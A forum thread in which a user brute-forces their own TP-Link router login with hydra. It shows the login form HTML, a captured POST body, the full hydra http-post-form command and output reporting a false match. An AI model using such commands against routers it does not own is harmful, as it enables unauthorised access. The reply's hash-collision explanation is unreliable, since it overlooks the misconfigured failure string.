I setup the most easiest password for my tplink router: aaaaaaac default user is admin
I looked at page source at and found this:
<FORM METHOD="POST" ACTION="/Forms/login_security_1" name="Login_Form"><p> </p>
<p> </p>
<table width="540" border="0" align=center cellpadding="0" cellspacing="0">
<tr>
<td><table width="100%" border="0" align=center cellpadding="0" cellspacing="0">
<tr>
<td height="31"> </td><td> </td><td> </td></tr><tr>
<td width="8%"> </td><td width="86%" valign=top>
<table width="86%" border="0" align=center>
<tr>
<td> </td><td> </td><td> </td></tr><tr>
<td align=center colspan=3 style="color:gray;font-family:Arial;text-align:left;margin:0px auto;font-size:14px;" id="tr1">
</td><INPUT TYPE="HIDDEN" NAME="tipsFlag" VALUE="0"><INPUT TYPE="HIDDEN" NAME="timevalue" VALUE="0"><SCRIPT language="JavaScript">
if(document.Login_Form.tipsFlag.value == 1){
var infoStr='The username or password is incorrect,please input again.';
document.getElementById("tr1").innerHTML = infoStr;
}else if(document.Login_Form.tipsFlag.value == 2){
timelast = document.Login_Form.timevalue.value;
window.setInterval("IncreaseSec()", 1000);
}
</SCRIPT>
</tr></table><table style="background-color:white" width="86%" border="0" align=center>
<tr>
<td height=35> </td><td> </td><td> </td></tr><tr>
<td align=right width=35%>
<FONT color=gray><b>
Username:</b></font>
</td><td><INPUT TYPE="TEXT" NAME="Login_Name" SIZE="12" MAXLENGTH="31" VALUE="" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
<td height=5> </td><td> </td><td> </td></tr><tr>
<td align=right >
<FONT color=gray><b>
Password:</b></font>
</td><td><INPUT TYPE="PASSWORD" NAME="Login_Pwd" SIZE="12" MAXLENGTH="31" VALUE="" autocomplete="off" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
<td align=center colspan=3>
<INPUT TYPE="BUTTON" NAME="texttpLoginBtn" VALUE="Login" class="LoginBtn" onClick="checkForm();"></td></tr><tr>
<td align=center colspan=3>
<INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenUsername" VALUE=""><INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenPassword" VALUE=""></td></tr><tr>
<td height="30" colspan="3" style="text-align:center;">
<label id="copyright" >
Copyright © 2014 TP-LINK Technologies Co., Ltd. All rights reserved.</label>
</td></tr></table></td><td width="6%"> </td></tr></table></td></tr></table><!-- RpZDT -->
</form><p> </p>
I also looked at POST source and found:
tipsFlag=0&timevalue=0&Login_Name=34&Login_Pwd=Ha2S%2BeOKqmzA6nrlmTeh7%3D%3D&uiWebLoginhiddenUsername=e369853df766fa44e1ed0ff613f563bduiWebLoginhiddenPassword=e369853df766fa44e1ed0ff613f563bd
So I attacked my own router with this line:
hydra -f -l admin -x 8:8:a -V 192.168.1.1 http-post-form "/login_security.html/Forms/login_security_1:tipsFlag=0&timevalue=0&Login_Name=^USER^&Login_Pwd=^PASS^&uiWebLoginhiddenUsername=^USER^&uiWebLoginhiddenPassword=^PASS^:bad"
Hydra found a wrong password
[80][http-post-form] host: 192.168.1.1 login: admin password: aaaaaaak
[STATUS] attack finished for 192.168.1.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
What I'm doing wrong?
It's hard for me to say what hydra is doing as I'm familiar.. but a lot of times passwords are hashed so you don't need the actual value you just need a value that hashes the same as your actual password. Check and see if aaaaaaak works as a sign-in password for your router and if it does it's just brute forcing from z-a which isn't what you were expecting.